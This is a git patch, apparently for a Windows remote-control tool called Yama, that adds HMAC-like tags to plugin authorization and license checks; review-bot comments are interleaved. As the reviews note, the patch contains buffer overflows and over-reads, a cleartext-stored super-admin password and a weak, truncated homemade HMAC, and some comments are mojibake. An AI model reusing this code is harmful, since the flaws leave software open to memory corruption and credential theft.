From 2e1a5156e9fb60bf27642cc70a3a205044ac6d80 Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Sat, 28 Jun 2025 04:03:06 +0800 Subject: [PATCH] Security: Improve the authorization of plugins --- client/KernelManager.cpp | 6 +++++- client/LoginServer.cpp | 4 ++++ common/commands.h | 9 ++++++--- server/2015Remote/2015RemoteDlg.cpp | 27 +++++++++++++++++++++++++-- server/2015Remote/CPasswordDlg.cpp | 5 +++++ server/2015Remote/CPasswordDlg.h | 2 ++ server/2015Remote/pwd_gen.cpp | 8 ++++++++ server/2015Remote/pwd_gen.h | 2 ++ 8 files changed, 57 insertions(+), 6 deletions(-) diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp index 21c0026..7759f70 100644 --- a/client/KernelManager.cpp +++ b/client/KernelManager.cpp @@ -220,8 +220,10 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) case CMD_AUTHORIZATION: { HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE"); hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE"); +#ifndef _DEBUG if (hMutex == NULL) // 没有互斥量,主程序可能未运行 break; +#endif CloseHandle(hMutex); char buf[100] = {}, *passCode = buf + 5; @@ -234,8 +236,10 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) memcpy(buf + 32, pwdHash, 64); // 64字节 m_ClientObject->Send2Server((char*)buf, sizeof(buf)); } else { + int* days = (int*)(buf + 1); config* cfg = pwdHash == masterHash ? new config : new iniFile; - cfg->SetStr("settings", "Password", passCode); + cfg->SetStr("settings", "Password", *days <= 0 ? "" : passCode); + cfg->SetStr("settings", "HMAC", *days <= 0 ? "" : buf + 64); delete cfg; g_bExit = S_SERVER_EXIT; } diff --git a/client/LoginServer.cpp b/client/LoginServer.cpp index 2d058e3..083ead4 100644 --- a/client/LoginServer.cpp +++ b/client/LoginServer.cpp 
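Review bot: With the NULL check now compiled out under `_DEBUG` in the `CMD_AUTHORIZATION` case, the unchanged `CloseHandle(hMutex);` after the added `#endif` can be reached with a NULL handle. CloseHandle fails on an invalid handle and raises an invalid-handle exception when the process runs under a debugger, which is the scenario a debug build is meant for. Guard the call: `if (hMutex) CloseHandle(hMutex);`. The `#else` branch added to GetLoginInfo in client/LoginServer.cpp has the same unguarded call. The case body continues outside the hunk.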
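Review bot: In the second KernelManager.cpp hunk, `buf + 64` is handed to `SetStr` as a C string, so the stored HMAC ends only where the received bytes happen to contain a NUL. The code that fills the 100-byte `buf` is outside the hunk, so a terminator inside the array cannot be confirmed from here. Bound the value before storing it, `std::string hmac(buf + 64, strnlen(buf + 64, 16));`, and pass `hmac.c_str()` in the ternary. The `(int*)(buf + 1)` cast also reads an int from an odd address; `int days = 0; memcpy(&days, buf + 1, sizeof(days));` avoids the misaligned access.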
@@ -266,7 +266,11 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, const CONNECT_ADDRESS& conn) std::string masterHash(skCrypt(MASTER_HASH)); HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE"); hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE"); +#ifndef _DEBUG if (hMutex != NULL) { +#else + { +#endif CloseHandle(hMutex); config*cfg = conn.pwdHash == masterHash ? new config : new iniFile; str = cfg->GetStr("settings", "Password", ""); diff --git a/common/commands.h b/common/commands.h index 717bd05..832f548 100644 --- a/common/commands.h +++ b/common/commands.h @@ -11,6 +11,8 @@ #include #ifdef _WIN32 +#define WIN32_LEAN_AND_MEAN +#include #include #include #define MVirtualFree(a1, a2, a3) VirtualFree(a1, a2, a3) @@ -580,7 +582,7 @@ struct ThreadInfo CONNECT_ADDRESS* conn; ThreadInfo() : run(1), h(NULL), p(NULL), user(NULL), conn(NULL) { } void Exit(int wait_sec = 15) { - run = FALSE; + run = 0; for (int count = 0; p && count++ < wait_sec; Sleep(1000)); #ifdef _WIN32 if (p) TerminateThread(h, 0x20250626); @@ -808,8 +810,8 @@ typedef struct Validation { char To[20]; // 结束日期 char Admin[100]; // 管理员地址(当前主控的公网地址) int Port; // 管理员端口(默认当前端口) - char Reserved[16]; // 预留字段 - Validation(float days, const char* admin, int port) { + char Checksum[16]; // 预留字段 + Validation(float days, const char* admin, int port, const char* id="") { time_t from = time(NULL), to = from + time_t(86400 * days); memset(this, 0, sizeof(Validation)); std::string fromStr = ToPekingTimeAsString(&from); @@ -818,6 +820,7 @@ typedef struct Validation { strcpy_s(To, toStr.c_str()); strcpy_s(Admin, admin); Port = port; + if(strlen(id))memcpy(Checksum, id, 16); } bool IsValid() const { std::string now = ToPekingTimeAsString(NULL); diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index aa0d049..c56c39b 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp 
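Review bot: In common/commands.h the comment on the renamed field still reads 预留字段 (reserved field), although `Checksum` now carries the 16-character tag passed in through the new `id` parameter. Update it to say what the field holds and that it has no terminator when full, for example `// first 16 chars of genHMAC(); not NUL-terminated when all 16 bytes are used`. The constructor body continues into the next hunk.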
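Review bot: `memcpy(Checksum, id, 16)` in the Validation constructor copies 16 bytes whenever `id` is non-empty, so a caller passing a shorter string makes it read past the end of `id`. The one caller in this patch passes a 16-character genHMAC result, but the constructor lives in a shared header and takes a plain `const char*`. Copy only what is there: `memcpy(Checksum, id, strnlen(id, sizeof(Checksum)));`. The earlier `memset` already zero-fills the remainder and the call is a no-op for an empty `id`, so the `strlen` test can be dropped.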
@@ -232,8 +232,11 @@ DllInfo* ReadPluginDll(const std::string& filename) { std::string masterHash(skCrypt(MASTER_HASH)); int offset = MemoryFind((char*)buffer + 1 + sizeof(DllExecuteInfo), masterHash.c_str(), fileSize, masterHash.length()); if (offset != -1) { - std::string masterId = GetPwdHash(); + std::string masterId = GetPwdHash(), hmac = GetHMAC(); + if(hmac.empty()) + hmac = THIS_CFG.GetStr("settings", "HMAC"); memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo)+offset, masterId.c_str(), masterId.length()); + memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo) + offset + masterId.length(), hmac.c_str(), hmac.length()); } // 璁剧疆杈撳嚭鍙傛暟 @@ -732,6 +735,15 @@ BOOL CMy2015RemoteDlg::OnInitDialog() OnMainExit(); return FALSE; } + if (GetPwdHash() == std::string(skCrypt(MASTER_HASH))) { + auto pass = THIS_CFG.GetStr("settings", "superAdmin"); + if (hashSHA256(pass) == GetPwdHash()) { + m_superPass = pass; + } else { + THIS_CFG.SetStr("settings", "superAdmin", ""); + } + } + // 灏嗏滃叧浜...鈥濊彍鍗曢」娣诲姞鍒扮郴缁熻彍鍗曚腑銆 SetWindowText(_T("Yama")); LoadFromFile(m_ClientMap, GetDbPath()); @@ -952,7 +964,13 @@ void CMy2015RemoteDlg::OnTimer(UINT_PTR nIDEvent) if (nIDEvent == TIMER_CHECK) { if (!m_superPass.empty()) { + Mprintf(">>> Timer is killed <<<\n"); KillTimer(nIDEvent); + std::string masterHash = std::string(skCrypt(MASTER_HASH)); + if (GetPwdHash() == masterHash) { + THIS_CFG.SetStr("settings", "superAdmin", m_superPass); + THIS_CFG.SetStr("settings", "HMAC", genHMAC(masterHash, m_superPass)); + } return; } if (!CheckValid(-1)) 
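Review bot: The `memcpy` added in ReadPluginDll writes `hmac.length()` bytes at `offset + masterId.length()` with no check against the buffer size, and `hmac` may come from the `HMAC` config value, whose length nothing in this hunk constrains. A long or corrupted config entry would therefore write past the end of `buffer`. Cap the tag and check the space first, for example `size_t n = std::min<size_t>(hmac.length(), 16);` followed by `if (offset + masterId.length() + n <= fileSize) memcpy(dst, hmac.data(), n);`. How `fileSize` relates to the allocation is outside the hunk, so confirm the bound against the real buffer length.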
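Review bot: The super-admin password is persisted in cleartext: the block added to OnInitDialog reads `superAdmin` back as the password itself, and the OnTimer hunk below writes it out with `THIS_CFG.SetStr("settings", "superAdmin", m_superPass)`. Anyone who can read that configuration obtains the secret from which every genHMAC tag is derived. Persist only what is needed to recompute tags (a derived key rather than the password), or protect the value at rest, for instance with DPAPI `CryptProtectData`. Whichever is chosen, add a comment at the `SetStr` call stating what is stored and why.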
@@ -1795,11 +1813,15 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject) int *days = (int*)(resp+1); if (devId[0] == 0 || pwdHash[0] == 0)break; // 瀵嗙爜褰㈠紡锛20250209 - 20350209: SHA256 + std::string hash = pwdHash; std::string password = getDateStr(0) + " - " + getDateStr(*days) + ": " + pwdHash; std::string finalKey = deriveKey(password, devId); std::string fixedKey = getDateStr(0) + std::string("-") + getDateStr(*days) + std::string("-") + getFixedLengthID(finalKey); memcpy(devId, fixedKey.c_str(), fixedKey.length()); devId[fixedKey.length()] = 0; + std::string hmac = genHMAC(hash, m_superPass); + memcpy(resp + 64, hmac.c_str(), hmac.length()); + resp[80] = 0; m_iocpServer->OnClientPreSending(ContextObject, (LPBYTE)resp, sizeof(resp)); break; } @@ -2762,7 +2784,8 @@ void CMy2015RemoteDlg::OnToolGenMaster() } } int port = THIS_CFG.GetInt("settings", "ghost"); - Validation verify(atof(days.m_str), master.c_str(), port<=0 ? 6543 : port); + std::string id = genHMAC(pwdHash, m_superPass); + Validation verify(atof(days.m_str), master.c_str(), port<=0 ? 6543 : port, id.c_str()); if (!WritePwdHash(curEXE + iOffset, pwdHash, verify)) { MessageBox("鍐欏叆鍝堝笇澶辫触! 鏃犳硶鐢熸垚涓绘帶銆", "閿欒", MB_ICONWARNING); SAFE_DELETE_ARRAY(curEXE); diff --git a/server/2015Remote/CPasswordDlg.cpp b/server/2015Remote/CPasswordDlg.cpp index d3409a0..8b0b845 100644 --- a/server/2015Remote/CPasswordDlg.cpp +++ b/server/2015Remote/CPasswordDlg.cpp @@ -29,6 +29,11 @@ std::string GetMasterId() { return id; } +std::string GetHMAC(int offset) { + const Validation * v= (Validation*)(g_MasterID + offset); + return v->Checksum; +} + extern "C" void shrink64to32(const char* input64, char* output32); // output32 蹇呴』鑷冲皯 33 瀛楄妭 extern "C" void shrink32to4(const char* input32, char* output4); // output4 蹇呴』鑷冲皯 5 瀛楄妭 diff --git a/server/2015Remote/CPasswordDlg.h b/server/2015Remote/CPasswordDlg.h index e2a0192..239ac0b 100644 --- a/server/2015Remote/CPasswordDlg.h 
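Review bot: `genHMAC(hash, m_superPass)` in MessageHandle runs even when `m_superPass` is empty, and in that case the key inside genHMAC is built from constants only, so the bytes written at `resp + 64` authenticate nothing. Emit the tag only when a super password is loaded, `if (!m_superPass.empty()) { ... } else resp[64] = 0;`, so a receiver can tell "no tag" from a real one. The `genHMAC(pwdHash, m_superPass)` call added in OnToolGenMaster needs the same guard. `resp[80] = 0` also assumes `resp` holds at least 81 bytes; its declaration is outside the hunk.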
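Review bot: `return v->Checksum;` in the new GetHMAC builds the string by scanning for a NUL, but the Validation constructor fills all 16 bytes of `Checksum` without a terminator. The result therefore runs on into whatever follows the field inside `g_MasterID`, and that over-long value is what ReadPluginDll then copies into the plugin buffer. Bound the read: `return std::string(v->Checksum, strnlen(v->Checksum, sizeof(v->Checksum)));`. `offset` is also used without a check against the size of `g_MasterID`, which is declared outside the hunk.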
+++ b/server/2015Remote/CPasswordDlg.h @@ -16,6 +16,8 @@ const Validation* GetValidation(int offset=100); std::string GetMasterId(); +std::string GetHMAC(int offset=100); + bool IsPwdHashValid(const char* pwdHash = nullptr); bool WritePwdHash(char* target, const std::string& pwdHash, const Validation &verify); diff --git a/server/2015Remote/pwd_gen.cpp b/server/2015Remote/pwd_gen.cpp index 6be4b71..f7a2e14 100644 --- a/server/2015Remote/pwd_gen.cpp +++ b/server/2015Remote/pwd_gen.cpp @@ -120,6 +120,14 @@ std::string hashSHA256(const std::string& data) { return result.str(); } +std::string genHMAC(const std::string& pwdHash, const std::string& superPass) { + std::string key = hashSHA256(superPass); + std::vector list({ "g","h","o","s","t" }); + for (int i = 0; i < list.size(); ++i) + key = hashSHA256(key + " - " + list.at(i)); + return hashSHA256(pwdHash + " - " + key).substr(0, 16); +} + // 生成 16 字符的唯一设备 ID std::string getFixedLengthID(const std::string& hash) { return hash.substr(0, 4) + "-" + hash.substr(4, 4) + "-" + hash.substr(8, 4) + "-" + hash.substr(12, 4); diff --git a/server/2015Remote/pwd_gen.h b/server/2015Remote/pwd_gen.h index ef3f30f..bddf4bb 100644 --- a/server/2015Remote/pwd_gen.h +++ b/server/2015Remote/pwd_gen.h @@ -9,6 +9,8 @@ std::string getHardwareID(); std::string hashSHA256(const std::string& data); +std::string genHMAC(const std::string& pwdHash, const std::string& superPass); + std::string getFixedLengthID(const std::string& hash); std::string deriveKey(const std::string& password, const std::string& hardwareID);
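Review bot: genHMAC in pwd_gen.cpp is not an HMAC: it is a keyed-suffix hash, `hashSHA256(pwdHash + " - " + key)`, cut to the first 16 characters of the digest string (64 bits if hashSHA256 returns hex, as its stringstream result suggests). The key is stretched from the password by only a handful of SHA-256 rounds, so the tag is short and the password behind it is cheap to test offline. Prefer a standard HMAC-SHA256 with a key derived through a slow KDF such as PBKDF2; on Windows, CNG offers both through `BCRYPT_ALG_HANDLE_HMAC_FLAG` and `BCryptDeriveKeyPBKDF2`. At minimum, add a comment above the function stating the actual construction and tag length so the name is not taken at face value. The loop index should also be `size_t` to match `list.size()`.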